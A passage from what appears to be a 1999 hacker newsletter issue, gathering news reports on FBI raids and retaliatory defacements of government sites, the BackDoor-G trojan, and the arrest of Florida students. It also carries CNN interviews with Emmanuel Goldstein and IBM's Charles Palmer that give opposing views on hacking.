~~~~~~~~~~~~~~~~~~~~~~~~~
RAIDED HACKERS
by BHZ, Friday 28th May 1999 on 6.32 pm CET
Our new Special Report talks about recent hackers versus Government, and FBI
versus hackers relations. White House was hacked, US Senate was hacked but
several hackers have been found. Read the article Real hacker war-games.
Real hacker war-games
Recently hackers became more and more active. US government and Universities
keep being hacked. Even the official White House site (www.whitehouse.gov) was
hacked, and replaced with anti-Clinton messages and pictures. Government struck.
Eric Burns aka Zyklon, a gH member was caught and indicted on the count of several
break-ins. His name was also mentioned in "greetz" area of hacked White House
site, so he was questioned about it too. Zyklon, 19 years old, could get up to 15 years
of imprisonment. His fellow hackers from gH hacked in revenge several domains
with messages of protest against the Government. MAST3RZ 0F D0WNL0ADING
earlier today hacked the official US Senate site (www.senate.gov), and wrote about
battle against FBI and US government. FBI site (www.fbi.gov) was under big DoS
(denial of service) attack, and the "attacker" mailed HNN about it (read his mail in
HNN Buffer Overflow section).
Today AntiOnline and HNN published more details of hackers raided by FBI 2 days ago.
HNN wrote that: "some of those who were raided were iCBM, MostHated, loophole,
soulblazer, fryz, vallah and Cl0pz". We found out that the following hackers were also involved
in these FBI actions:
- Zyklon (he is found and indicted)
- Spacegoat (already found)
- Spade (already found)
- Overfien (still looking for him)
- Rottenboy (still looking for him)
- Hybrid (still looking for him)
- Sketch (still looking for him)
- Lord Omino (still looking for him)
The crew from Channel 12 did a background check on the hackers and their supposed crimes.
- Rottenboy aka PowerDragon is wanted for telecommunications fraud
- Gino Ramano is also wanted for telecommunications fraud
- Lord Omino aka moviesmith is too wanted for telecommunications fraud
- Overfien is suspected in:
1. hacking various subnets for the hacker group GH
2. hacking mit.edu, zapnow.com, wwu.edu, washington.edu
3. cracking into syprnet (government's classified network)
4. leaving 221 computers infiltrated with the words "overfien wuz here"
5. wanted in Oregon for Western Union fraud "$60,000"
6. also possible accounts of forgery and theft
- Sketch aka mode is wanted for telecommunications fraud
- Grip aka JF is wanted for hacking
- loophole aka Elaich is also wanted for hacking
- Hybrid is wanted for telecommunications fraud
BHZ
for Help Net Security
http://net-security.org
@HWA
16.0 MOD hacks Senate site
~~~~~~~~~~~~~~~~~~~~~
From http://www.maximumpcmag.com/
05.28.99 11:53
Hackers Add Senate To Victims
Hackers have added the U.S. Senate's main page to their list of owned
web sites in an escalating war between the FBI and "crackers" around
the globe.
Hackers defaced the main page for the Senate late Thursday
leaving the message: "The FBI may be all over the other groupz, like
those gH and tK queerz, cl00bagz gal0re. M0D make th0se m0ronz l00k
like a gr0up of special-ed st00dentz!@# FBI vs. M0D in '99, BR1NG IT
0N FUQRZ! (BTW NIPC IZ ALS0 0WNED)."
Members of the MOD group told security site, Antionline, that they
gained access to another computer on the Senate's network, installed a
sniffer, and swiped the administrator's passwords. On Friday, the
Senate's page was still down but a mirror of the hacked site was kept on
Antionline.
On Wednesday, an attack on the FBI's main page spooked the agency
enough to take down its main page. The FBI's page also remained down
Friday morning.
Related Story: FBI Site Attacked
FBI Site Attacked
The latest victim in a skirmish between hackers and the FBI may have been
the brown-shoes' own web site.
The FBI's main web page remained offline Thursday afternoon while the Bureau
checked it for security intrusions. The FBI reportedly took the page down
Wednesday after someone attempted to hack it.
The skirmish apparently began Wednesday morning when FBI agents in
the Houston office raided the homes of hackers who allegedly belonged
to a group called "gH." Agents did not arrest anyone but confiscated
computers of numerous people.
According to security news site, antionline.com, the FBI has also directed
numerous ISPs to preserve backup tapes, logs, e-mail, and IRC
conversations for about thirty individuals suspected of being hackers.
Nando Times;
Hackers take down FBI and Senate Internet sites
Copyright © 1999 Nando Media
Copyright © 1999 Associated Press
By TED BRIDIS
WASHINGTON (May 28, 1999 12:04 a.m. EDT http://www.nandotimes.com) - Computer hackers
continued a series of electronic attacks against Internet sites of federal agencies on Thursday, defacing the
Web page for the U.S. Senate before it was taken down.
The Web site for the FBI also remained inaccessible late Thursday, a day after the agency said hackers tried
unsuccessfully to compromise it. It was unclear when the FBI site might be made available again.
"There was an attempt (Wednesday) by unknown persons to unlawfully gain access to the FBI.Gov Web site,"
according to a statement Thursday from the agency. "It was unsuccessful; however, as a precaution, the FBI
shut down the site and is now taking additional steps to further insulate it."
An obscene message left briefly on the Senate's Web site Thursday blamed the attack on what it said was the
FBI's harassment of specific hacker groups, including the group that took credit for breaking into the White
House site earlier this month.
"Who laughs last? ...," the message said, adding that the intent was to send a monition "... to our friends at the
FBI."
Other federal Web sites, including those for the White House and the House of Representatives, appeared to
be operating normally late Thursday.
MSNBC reported that the attacks stemmed from the FBI's executing a search warrant on the home of a
prominent hacker in Houston, Texas.
FBI spokesman Rolando Moss confirmed that agents were investigating allegations of computer intrusions
involving the Houston hacker. The FBI executed four search warrants that remained sealed, Moss said.
Earlier this month, a grand jury in northern Virginia indicted Eric Burns, 19, on three counts of computer
intrusion. Burns is reportedly known on the Internet as "Zyklon" and believed to be a member of the group that
claimed responsibility for the attacks on the White House and the Senate sites.
Federal prosecutors accused Burns of breaking into a computer between August 1998 and January 1999 in
northern Virginia that is used by the U.S. Information Agency.
"Zyklon" was one of a dozen names listed on the hacked version of the White House Web site, which was
altered overnight Sunday for a few minutes before government computers automatically detected the intrusion.
The grand jury also accused Burns of breaking into two other computers, one owned by LaserNet of Fairfax,
Va., and the other by Issue Dynamics Inc. of Washington.
CNN;
Hackers react to FBI
crackdown by invading
Senate Web site
May 27, 1999
Web posted at: 11:04 p.m. EDT (0304 GMT)
WASHINGTON (CNN) --
Computer hackers reacted to an FBI crackdown by launching cyber assaults
Thursday on government Web sites, including the one belonging to the U.S.
Senate.
People calling up the Senate Web site on Thursday were redirected to one
belonging to the hackers. Posted on the site under the hackers' logo was
the question: "Who laughs last?"
The cyber intruders wrote that their Internet invasion of the legislative site
was a way for them to thumb their noses at the FBI.
Federal agents earlier this week executed search warrants on
suspected hackers' homes in Dallas, Houston and other locations. FBI
sources did not specify if anyone was arrested, but said they believe word of
the raids quickly spread in the computer community.
That attempt to crack down on computer hackers preceded a seemingly
coordinated cyber attack that overloaded the FBI's own Web site, forcing
the agency to shut down the site, officials said Thursday.
FBI officials said their site was besieged with computer hits by scores of
computer users who were apparently outraged over the raids.
No virus was planted in the FBI site, but the sheer number of hits overloaded
the system, said FBI spokesman Frank Scafidi, who described the incident as a
"denial of service attack."
He said the system has been shut down temporarily so additional firewalls
can be erected to protect it. It was unclear when the site would be back up.
The FBI's site contains general information about the agency and does not
house sensitive information.
Justice Correspondent Pierre Thomas contributed to this report.
@HWA
17.0 Backdoor-G a new 'backorifice like' trojan and BO2K
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
Back Orifice, NetBus, and now BackDoor-G
contributed by N4vi11Us
Yet another Trojan horse that leaves MS Windows systems wide open has been discovered.
This new backdoor tool is similar to Back Orifice or NetBus. NetBus is now a commercial
shareware product. Back Orifice has undergone a major rewrite and a new version, BO2K,
is expected to be released at this year's DefCon hacker convention. Once a system has
had any one of these programs installed, it becomes wide open to unknown remote users
who have complete control over the system.
MSNBC
ZD Net
From MSNBC; http://www.msnbc.com/news/274094.asp
New Back Orifice-like Trojan found
BackDoor-G allows remote access to victim's PC; Trojan
horse arrives as spam with screen saver or game update
By Bob Sullivan
MSNBC
May 27 Security researchers at Network
Associates Inc. say they have found another
Back Orifice-like Trojan Horse hack tool called
BackDoor-G. The Trojan horse arrives in a
user's e-mail posing as a screen saver or game
update, but once executed, it turns the victim's
PC into an open client. Then, a hacker can
add, delete, move or execute files on the victim's
computer at will from anywhere on the Internet.
BACKDOOR-G IS BEING SENT out in spam mail,
according to Sal Viveros, group marketing manager at
Network Associates. The company discovered it
Wednesday.
Updated versions of virus scanning software, including
Network Associates products, will detect BackDoor-G and
clean it from a victim's system.
Such remote administration tools started to surface
last year when Back Orifice was released by a group calling
itself the Cult of the Dead Cow. NetBus, another such tool,
has since been developed into a commercial product by its
author. With both programs, a victim is tricked into
executing an e-mail attachment which then opens his PC to
remote connections via the Internet. Once a victim is
infected, a hacker can do anything to a machine that the
victim can, including erasing all files or copying all files.
Such tools represent a dangerous blending of what
might once have been considered relatively harmless pranks
by virus writers and hackers, Viveros said.
"We're seeing these types of malicious code attacks,
which are trying to attack information directly or indirectly,"
he said. "Now we're seeming to blur the lines between
malicious code attacks and [data] vulnerability."
BackDoor-G already has a variant: a very similar
Trojan named Armageddon was discovered in France this
morning.
Several Network Associates clients opened the
attachment and exposed their systems, Viveros said. But
when the promised screen saver did not execute, they called
the virus company.
@HWA
18.0 [CNN] A Q&A with Emmanuel Goldstein, editor of 2600 magazine
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I didn't see a date on the following interviews but they appear fairly timeless
so since I just found them I thought i'd share em with you...- Ed
http://www.cnn.com/TECH/specials/hackers/qandas/
Q&A with Emmanuel Goldstein of
2600: The Hacker's Quarterly
(CNN) -- Emmanuel Goldstein is the editor-in-chief
of 2600: The Hacker Quarterly and hosts a weekly
radio program in New York called "Off the Hook."
1. How do you define hacking?
Hacking is, very simply, asking a lot of
questions and refusing to stop asking. This
is why computers are perfect for inquisitive
people -- they don't tell you to shut up
when you keep asking questions or inputting
commands over and over and over. But
hacking doesn't have to confine itself to
computers. Anyone with an inquisitive mind,
a sense of adventure and strong beliefs in
free speech and the right to know most
definitely has a bit of the hacker spirit in
them.
2. Are there legal or appropriate forms of
hacking?
One of the common misconceptions is that
anyone considered a hacker is doing
something illegal. It's a sad commentary on
the state of our society when someone who
is basically seeking knowledge and the truth
is assumed to be up to something nefarious.
Nothing could be further from the truth.
Hackers, in their idealistic naiveté, reveal
the facts that they discover, without
regard for money, corporate secrets or
government coverups. We have nothing to
hide, which is why we're always relatively
open with the things we do -- whether it's
having meetings in a public place or running
a system for everyone to participate in
regardless of background. The fact that we
don't "play the game" of secrets also makes
hackers a tremendous threat in the eyes of
many who want to keep things away from
the public.
Secrets are all well and good, but if the
only thing keeping them a secret is the fact
that you say it's a secret, then it's not
really a very good secret. We suggest using
strong encryption for those really interested
in keeping things out of the hands of
outsiders. It's interesting also that hackers
are the ones who are always pushing strong
encryption -- if we were truly interested in
getting into everyone's personal affairs, it's
unlikely we'd try and show them how to
stay secure. There are, however, entities
who are trying to weaken encryption.
People should look toward them with
concern, as they are the true threat to
privacy.
3. What in your mind is the purpose of
hacking?
To seek knowledge, discover something
new, be the first one to find a particular
weakness in a computer system or the first
to be able to get a certain result from a
program. As mentioned above, this doesn't
have to confine itself to the world of
computers. Anyone who's an adventurer or
explorer of some sort, or any good
investigative journalist, knows the feeling of
wanting to do something nobody has ever
done before or find the answer despite
being told that you can't. One thing that all
of the people involved in these endeavors
seem to share is the feeling from outsiders
that they're wasting their time.
4. Are you a hacker? Why? Or why not?
Absolutely. It's not something you can just
erase from your personality, nor should you
want to. Once you lose the desire to mess
around with things, tweak programs and
systems, or just pursue an answer doggedly
until you get a result, you've lost a very
important part of yourself. It's quite
possible that many "reformed" hackers will
lose that special ingredient as they become
more and more a part of some other entity
that demands their very souls. But for those
who can resist this, or figure out a way to
incorporate "legitimacy" into their hacker
personalities without compromising them,
there are some very interesting and fun
times ahead.
5. What kind of hacking do you do?
My main interest has always been phones
and rarely does a day pass when I don't
experiment in some way with a phone
system, voice mail system, pay phone, or
my own telephone. I've always been
fascinated by the fact that we're only a
few buttons away from virtually anyone on
the planet and I hope that I never lose that
sense of marvel.
One of the most amazing things I ever got
involved in was routing phone calls within
the network itself -- known as blue-boxing.
You can't do that as easily any more, but it
was a real fun way to learn how everything
was connected -- operators, services,
countries, you name it. And in the
not-too-distant past, there were so many
different sounds phones made depending on
where you were calling. Now they tend to
be standardized rings, busies, etc. But the
magic hasn't disappeared, it's just moved on
to new things ... satellite technology, new
phone networks and voice recognition
technologies.
Many times these new technologies are
designed by the very people who were
hacking the old technologies. The result is
usually more security and systems that
know what people will find useful. While I've
spent a great deal of time playing with
phones, I get the same sense of fun from
computer systems and have invested lots of
time exploring the Internet. It would fill a
book to outline all of the hacker potential
that exists out there. And, of course,
there's radio hacking, which predates a lot
of the current technology. It's gotten to
the point where simply listening to a certain
frequency has become a challenge. It's hard
to believe that it's actually turned into a
crime to listen to some of these
non-scrambled radio waves. But this is the
price we pay when people with no
understanding of technology are the ones in
charge of regulating it.
6. How much time do you spend at it a week?
That's like asking how much time you spend
breathing. It's always with you, you do
more of it at certain times, but it's always
something that's going on in your head.
Even when I sleep, I dream from a hacker
perspective.
7. Do you have a certain kind of site or
"target" sites that most attract you?
We don't sit around with a big map and a
list of targets. In fact, we don't even sit
around together. Most hacking is done by
individuals who simply find things by
messing around and making discoveries. We
share that info and others add input. Then
someone tells the press and the
government that we're plotting to move
satellites and all hell breaks loose.
I think most of us tend to be drawn to the
sites and systems that are said to be
impossible to access. This is a normal
human reaction to being challenged. The
very fact that we continue to do this after
so many of us have suffered so greatly
indicates that this is a very strong driving
force. When this finally becomes recognized
as a positive thing, perhaps we'll really be
able to learn from each other.
8. What, in general, do you think attracts
people to hacking?
People have always been attracted to
adventure and exploration. Never before
have you been able to get this without
leaving your house and without regard to
your skin color, religion, sex, or even the
sound of your voice. On the Internet,
everyone is an equal until they prove
themselves to be a moron. And even then,
you can always start over. It's the ability to
go anywhere, talk to anyone, and not
reveal your personal information unless you
choose to -- or don't know enough not to
-- that most attracts people to the hacker
culture, which is slowly becoming the
Internet culture.
We find that many "mainstream" people
share the values of hackers -- the value of
free speech, the power of the individual
against the state or the corporation, and
the overall sense of fun that we embrace.
Look in any movie where an individual is
fighting a huge entity, and who does the
audience without exception identify with?
Even if the character breaks the rules, most
people want him/her to succeed because
the individual is what it's all about.
9. Do you know enough hackers personally to
know what personality traits they share, if
any?
Hackers come from all different backgrounds
and have all kinds of lifestyles. They aren't
the geeks you see on television or the
cyberterrorists you see in Janet Reno news
conferences. They range in age from under
10 to over 70. They exist in all parts of the
world, and one of the most amazing and
inspiring things is to see what happens
when they come together. It's all about
technology, the thrill of discovery, and
sharing information. That supersedes any
personality issues that might be an issue in
other circumstances.
10. Do you think hackers are productive and
serve a useful purpose?
I think hackers are necessary, and the
future of technology and society itself
(freedom, privacy, etc.) hinges on how we
address the issues today that hackers are
very much a part of. This can be the
dawning of a great era. It can also be the
beginning of true hell.
11. What percentage would you say are
destructive as opposed to those in it out of
intellectual curiosity or to test their skills?
This raises several points that I feel
strongly about. For one thing, hacking is
the only field where the media believes
anyone who says they're a hacker. Would
you believe someone who said they were a
cop? Or a doctor? Or an airline pilot? Odds
are they'd have to prove their ability at
some point or say something that obviously
makes some degree of sense. But you can
walk up to any reporter and say you're a
hacker and they will write a story about you
telling the world that you're exactly what
you say you are without any real proof.
So every time a movie like "Hackers" comes
out, 10 million people from AOL send us
e-mail saying they want to be hackers, too,
and suddenly, every 12-year-old with this
sentiment instantly becomes a hacker in the
eyes of the media and hence, the rest of
society. You don't become a hacker by
snapping your fingers. It's not about getting
easy answers or making free phone calls or
logging into someone else's computer.
Hackers "feel" what they do, and it excites
them.
I find that if the people around you think
you're wasting your time but you genuinely
like what you're doing, you're driven by it,
and you're relentless in your pursuit, you
have a good part of a hacker in you. But if
you're mobbed by people who are looking
for free phone calls, software or exploits,
you're just an opportunist, possibly even a
criminal. We already have words for these
people and it adequately defines what they
do. While it's certainly possible to use
hacking ability to commit a crime, once you
do this you cease being a hacker and
commence being a criminal. It's really not a
hard distinction to make.
Now, we have a small but vocal group who
insist on calling anyone they deem
unacceptable in the hacker world a
"cracker." This is an attempt to solve the
problem of the misuse of the word "hacker"
by simply misusing a new word. It's a very
misguided, though well-intentioned, effort.
The main problem is that when you make up
such a word, no further definition is
required. When you label someone with a
word that says they're evil, you never really
find out what the evil was to begin with.
Murderer, that's easy. Burglar, embezzler,
rapist, kidnapper, all pretty clear. Now along
comes cracker and you don't even know
what the crime was. It could be crashing
every computer system in Botswana. Or it
could be copying a single file. We need to
avoid the labeling and start looking at what
we're actually talking about. But at the
same time, we have to remember that you
don't become a hacker simply because you
say you are.
12. Do people stay in hacking a long time, or
is it the kind of thing that people do for a few
years and then move on to something else?
It can be either. I tend to believe that it's
more of a philosophy, a way of looking at
something. When you have the hacker
perspective, you see potential where others
don't. Also, hackers think of things like
phones, computers, pagers, etc., as toys
and things to be enjoyed whereas others
see work and responsibility and actually
come to dread these things. That's why
hackers like to hold onto their world and not
become part of the mainstream. But it
certainly can and does happen.
13. What is the future of hacking?
As long as the human spirit is alive, there
will always be hackers. We may have a hell
of a fight on our hands if we continue to be
imprisoned and victimized for exploring, but
that will do anything but stop us.
14. Given increased attention to corporate
and government security, is it getting tougher
to hack or not?
Hacking isn't really about success -- it's
more the process of discovery. Even if real
security is implemented, there will always
be new systems, new developments, new
vulnerabilities. Hackers are always going to
be necessary to the process and we're not
easily bored.
15. Is the possibility of being identified and
even prosecuted an issue for most hackers?
Hackers make very bad criminals. This is
why we always wind up being prosecuted.
We don't hide very well or keep our mouths
sealed shut to protect corporate or
government interests. But the same
security holes would exist even if we
weren't around, so I think the hackers
should be properly seen as messengers.
That doesn't mean that you should expect
them to just hand over all of their
knowledge -- it's important to listen and
interpret on your own, as any hacker would.
16. Are there hackers who are up for hire?
What are they paid? Who hires them, and for
what?
Just as you can use hacker ability to attain
a life of crime, you can use that ability to
become a corporate success. Some are able
to hold onto their hacker ideals. Others,
sadly, lose them. It's especially hard when
young people who haven't worked it all out
yet are approached and tempted with huge
amounts of money by these entities. It can
be very hard to resist and the cost is often
greater than anticipated.
17. Have you had any contact with people
you consider cyberterrorists? Do you endorse
what they do?
In all of the time I've been in the scene,
which is a pretty long time, I've never come
across anyone I consider to be a
"cyberterrorist," whatever that is. Most
people who talk of such creatures either
have something to sell or some bill to pass.
This is not to say that such a concept is
impossible. But I believe the current
discussions aren't based in reality and have
very suspicious ulterior motives.
18. What about the people who hack into
Pentagon sites? Do you think they should be
punished?
According to the Pentagon, there is no risk
of anything classified being compromised
because it's not on the Internet. If they
were wrong, I would like to see someone
prove that. If a non-classified site is
hacked, I don't see the harm unless
something is damaged in some way.
Remember, the security hole was already
there. If a hacker finds it, it's far more likely
the people running the system will learn of
the hole. If a criminal or someone with an
ulterior motive (espionage, etc.) finds the
hole first, it's likely to remain secret for
much longer and the harm will be far
greater.
While you may resent the fact that some
14-year-old from Topeka proved your
security sucks, think of what could have
happened had you not learned of this and
had someone else done it instead. I'm the
first to say that people who cause damage
should be punished, but I really don't think
prison should be considered for something
like this unless the offender is a true risk to
society. The great majority of these cases
do not involve damage or vandalism, a fact
that largely goes unreported. What people
have to remember is that most of the time,
this is simply an example of kids being kids
and playing games like they have always
done.
Obviously, the tools have changed, but
that's really not something the kids are
responsible for. If some kid somewhere can
access your medical records or your phone
records, he or she is not the one who put
them there. The true violator of your
privacy is the person who made the
decision to make them easily accessible.
19. Your real name is Eric Corley. Why do you
use the name Emmanuel Goldstein?
I believe everyone should be given the
opportunity to name themselves. That name
should reflect something about who you are
and what you believe in and stand for.
Emmanuel Goldstein is that for me, and for
those who want to learn why, get a copy of
George Orwell's "1984" and see for yourself.
Interestingly, our first issue of 2600 was
published in January 1984. A complete
coincidence.
19.0 [CNN] 'Hacking is a felony': Q&A with IBM's Charles Palmer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/TECH/specials/hackers/qandas/
Q&A with IBM's Charles Palmer
(CNN) -- Dr. Charles C. Palmer is the manager of
Network Security and Cryptography and head of
the Global Security Analysis Lab, which includes
IBM's ethical hacking unit.
1. How do you define hacking?
Hacking is unauthorized use of computer
and network resources. (The term "hacker"
originally meant a very gifted programmer.
In recent years though, with easier access
to multiple systems, it now has negative
implications.)
2. Are there appropriate forms of hacking?
Hacking is a felony in the United States and
most other countries. When it is done by
request and under a contract between an
ethical hacker and an organization, it's OK.
The key difference is that the ethical
hacker has authorization to probe the
target.
3. What do you and the other members of
your team do?
(We) work with IBM Consulting and its
customers to design and execute thorough
evaluations of their computer and network
security. Depending on the evaluation they
request (ranging from Web server probes to
all-out attacks), we gather as much
information as we can about the target
from publicly available sources. As we learn
more about the target, its subsidiaries and
network connectivity, we begin to probe for
weaknesses. Examples of weaknesses
include poor configuration of Web servers,
old or unpatched software, disabled
security controls, and poorly chosen or
default passwords. As we find and exploit
vulnerabilities, we document if and how we
gained access, as well as if anyone at the
organization noticed. (In nearly all the
cases, the Information Systems
department is not informed of these planned
attacks.) Then we work with the customer
to address the issues we've discovered.
4. What is the background of the people on
your team?
We have Ph.D.s in physics, computer
scientists, and even one former
photographer with a fine arts degree. They
are all well-known, highly respected system
security professionals from around the
world. Most of them did not start their
careers in this area, but ended up doing
computer and network security because
they were provoked by hackers at one time.
Once they started on the road to improving
security, they got hooked on the challenges
it presents.
5. In "Helpful Hacking" from IBM Research
magazine in 1997, you are quoted as saying
you don't hire reformed hackers and "there's
no such thing." Could you explain?
The number of really gifted hackers in the
world is very small, but there are lots of
wannabes.... When we do an ethical hack,
we could be holding the keys to that
company once we gain access. It's too
great a risk for our customers to be put in a
compromising position. With access to so
many systems and so much information, the
temptation for a former hacker could be too
great -- like a kid in an unattended candy
store.
6. Is it fair to say that you are opposed to
hacking?
As I said before, hacking is a felony -- for
good reason. Some of the "joyriders" --
hackers who access systems just for the
challenge -- think it's harmless since they
usually don't "do" anything besides go in
and look around. But if a stranger came into
your house, looked through everything,
touched several items, and left (after
building a small, out of the way door to be
sure he could easily enter again), would you
consider that harmless? These joyriders
could be causing damage inadvertently
since just by their presence they are using
system resources.
7. Do you think hacking can be useful?
Hacking can be useful in a controlled
environment where there are ground rules
and contractual agreements.
8. Do you have a profile of the typical hacker?
The profile has broadened in the last couple
of years to include many types of people,
which makes it very difficult to call out a
"typical" hacker. The motivations behind
hacking have changed (see Answer No. 11
below). No longer are hackers limited to the
teen-age, soda-slurping misfits, although
they're probably the majority. There are
girls and even younger kids. Many
companies think all hackers come from
outside, but surveys continue to show that
the threat from inside an organization is
greater than from outside. So if your
system is compromised, it could be a
Gen-Xer sitting in a dark apartment, or the
woman in the cubicle next to you.
9. There have been reported instances where
corporate security personnel have tracked
hacking back to the source, broken in and
stolen computers, or even used force. Do you
endorse "vigilantism" as a response to
hacking?
I've heard those stories, too, and I don't
believe most of them. It makes zero sense
to respond to an illegal attack with another
illegal attack. First of all, it can be very
difficult to accurately determine where an
attack comes from. Whether they end up
retaliating against the right or wrong
person, they've committed a felony and are
just as guilty as the original perpetrator. It's
no different than other forms of vigilante
justice.
10. What about attacking Web sites that list
hacking scripts?
Again, any attack is a felony. It's a First
Amendment rights issue as well. Where do
you draw the line? Attacking adult sites?
Attacking spammers? It makes more sense
for corporations, schools and other
organizations to try to block access to
those sites.
11. Can you characterize the nature of most
hacking attacks?
A few years ago, the original motivations
were pursuit of knowledge and the desire to
"show off" one's skills. Now, there are new
lures of money and power. However, the
statistics can be misleading, so many of
these incidents go unreported due to lack
of detection or fear of further losses due to
tarnished image and credibility.
I believe that the majority of hacks are still
motivated by curiosity and a desire to point
out system weaknesses. However, as
organizations have been finding, most of
today's threats come from within the
organization. According to a recent META
Group study, current figures indicate that
recent breaches of security within
Information Technology organizations occur
internally 58 percent of the time. The
threat from the outside is rising at a steady
rate, though.
12. Is there a trend in these attacks?
Denial-of-service attacks and macro-viruses
are the most popular hacker activities. The
denial-of-service attacks are fairly easy for
hackers of all skill levels -- from "script-kids"
to professionals -- to launch. This is a
situation where a company's Web site or
online service is simply made unavailable by
a hacker overtaxing the system resources.
It doesn't sound that harmful, but there can
be serious monetary and image losses
attached to this. If you want to buy a book
and you go to a popular book-selling Web
site and find that site unavailable, chances
are you'll try the next most popular book
Web site. There's simply too much
competition on the Internet right now to
overlook security needs. These
denial-of-service attacks are particularly
troubling because they are hard to defend
against. There are defenses available with
firewall products from IBM and other
companies, but there can be
denial-of-service attacks from inside as
well, which lends credence to the argument
for Intranet firewalls.
13. Where does the real threat of hacking lie:
in the private sector, in government or
somewhere else?
The widely reported attacks against
government sites are troubling, but it's a
good bet that the government would not
have any sensitive information on a machine
connected to the Internet. An unfortunate
side effect of these reports is that people
end up thinking that securing systems and
networks is hard. It's not hard, but it does
take time and training, and it's an ongoing
process to stay one step ahead of the bad
guys.
Corporate espionage is also a threat, but
not in the glamorous way portrayed in the
movies. There, the threat is from the inside.
There have been many reports of
employees purposely sending proprietary
information outside the company to other
companies, perhaps just before they
themselves move to that company. The
greater connectivity that employees have
today also leads them to inadvertent leaks
via e-mail.
14. To what extent is cyberterrorism a
genuine concern?
There is little motivation for industrial
control systems like those running nuclear
plants or airports to be on the open Web.
They may have dial-up access or private
networks within the organization that would
be susceptible to attack from the inside.
IBM has found that it can be quicker and
cheaper to attack a target physically,
rather than digitally -- we've nonchalantly
walked into businesses, snooped around,
and walked out with confidential material
(once with the security guard holding the
door for us!). And there are many examples
of unfortunate accidents that resulted in
very effective "attacks." The most common
example is the "backhoe attack," where an
errant heavy-equipment operator
accidentally cut a communications cable.
... I don't think we are "at war," because in
this problem the enemy includes ourselves.
We view it more as a race -- we're all trying
to stay a few steps ahead of the threats ...
through improved education and
technology. ... The good news is that
people are thinking about these issues, and
some groups appear to be taking action.
15. What about responses such as the recent
Pentagon counteroffensive that redirected
hackers' attack to an applet that caused their
browsers to crash? Is that an appropriate
response to hackers?
Anytime you acknowledge the hacker, you
run the risk of heightening his or her
interest. If you change the game from
solitaire to a real poker game with human
opponents, it becomes more interesting to
most hackers. Such retaliation is also
short-lived, since countermeasures will
quickly be developed and publicized around
the Web. In my opinion, this is not an
effective usage of limited security
personnel.
16. Are anti-hacking measures improving?
The most important improvement is in the
area of awareness. ... Advances in firewall
technology (making them easier to install
and configure), improvements in
vulnerability scanning and better
explanations of how to repair them, and
better intrusion-detection with fewer
false-positives are all key technologies in
this race.
17. If attacks can only take place on
computers that are online, to what extent
could hacking be mitigated by keeping
sensitive materials, data, etc., offline?
One of my colleagues at IBM likes to say,
"only trust physics." My version is that the
only 100 percent, truly secure system is
one that is powered-off and filled with
concrete. The military has long understood
the security of an "air gap" (where a secure
machine has no connection whatsoever to
an unsecured machine), and we recommend
to our customers that they consider such
an arrangement for their most secure
systems. This comes down to risk-analysis
-- that is, weighing the cost in convenience
and availability against the threat of having
a system online.
If it's important to ... your business to have
data available online inside the company,
then protecting it with an internal firewall
makes sense. ... If you have a Web server
you want your customers to access, you
can't hide it behind your corporate firewall
because they won't be able to get to it.
There are network designs that will enable
you to position the Web server on the
"outside," while securely maintaining a
connection between it and, perhaps, a
server behind the firewall.
18. What is the long-term outlook for
hacking?
As long as there are unsecured computers
with interesting stuff on them, there will be
hackers. Law enforcement agencies have
stepped up their facilities and training
programs to meet the demand for computer
and network security.
Moving toward technologies that use strong
encryption will greatly improve the overall
security of systems. Virtual Private
Networks are a fantastic tool for companies
and governments to protect their systems
and networks while taking advantage of the
low-cost, high-availability offered by the
Internet. Internet standards bodies are also
moving toward designing security into new
standards.
Most kids today know much more about
computers than their parents do, and some
start "messing around" at earlier ages than
in the past. The best thing we can do is to
show them how interesting it can be to
work at protecting systems and networks.
19. What about the outlook for computer
security?
While better security technologies are
appearing all the time, education and
awareness will continue to be the limiting
factor. System administrators must learn
about and maintain their systems securely.
Users have to understand their security
responsibilities (like choosing good
passwords, not installing unauthorized
modems, etc.). ... Innovations like
biometrics and smart cards will go a long
way toward making security easier for the
end user as well as for the system
administrators.
@HWA
20.0 Five Busted in Florida
~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by squid stupid
It has been hard to nail down specific information but a
few local news outlets in Florida are reporting that four
students of Flagler Palm Coast High School may face a
slew of criminal charges for unlawful computer access.
The suspects have been accused of deleting grade files
and compromising exams on their school computer system.
Yahoo News
http://dailynews.yahoo.com/headlines/local/state/florida/story.html?s=v/rs/19990526/fl/index_6.html#11
Student Hackers Arrested - (BUNNELL) -- Five Flagler Palm Coast High School
students... including the son of a Bunnell city commissioner... are facing a
litany of criminal charges after allegedly using a computer virus to hack into
the school's network and commandeer files. No grades were changed but grade files
were deleted and exams compromised. The virus was discovered last month during a
software upgrade. The school's computer experts also found that each of the five
students had downloaded a ``hacker tool'' from the Internet into their personal
computer accounts. They've been suspended for the rest of the year... but the
students will be allowed to take their final exams next month. Prosecutors have
not decided if they will file criminal charges.
From ISN mailing list
Date: Thu, 27 May 1999 02:58:09 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] Five arrested for hacking into high school system
Forwarded From: bluesky@rcia.com
May 26, 1999
Five arrested for hacking into high school system
By MATT GOWEN
BUNNELL - Five Flagler Palm Coast High School students - one the son of a
Bunnell city commissioner - are facing a litany of criminal charges after
authorities said they used a computer virus to hack into the school's
network and commandeer teacher and student files.
Flagler County sheriff's deputies arrested the students Monday. All five
were taken to the Division of Youth Services in Daytona Beach before being
released to their parents.
Facing the brunt of the allegations are Steven Alverson, 17, and Daniel
Bixby, 16, both of Palm Coast. Alverson was charged with 16 separate
felony counts, eight for crimes involving computers and eight for crimes
against computer users. Bixby was charged with 12 similar counts. Alverson
and Bixby were suspended until the end of the school year, June 4.
Arrested on two felony charges each were Yen Chen, 16, and Henry
Cervantes, 17, both of Palm Coast, and Daniel Dupont, 17, of Bunnell, son
of City Commissioner Catherine Robinson. School officials gave Chen,
Cervantes and Dupont in-school suspension until the end of the year.
The five will be allowed to return to take final exams June 7 and 8.
As for the criminal case, the State Attorney's Office will now decide
whether formal charges should be filed.
The arrests capped a lengthy investigation into the presence of the virus
- a disabling computer program that gave the students access to teacher
grade books and to exams on the system, according to reports.
The virus was initially discovered April 8 by technology support
personnel who were upgrading the school's protective software. In a
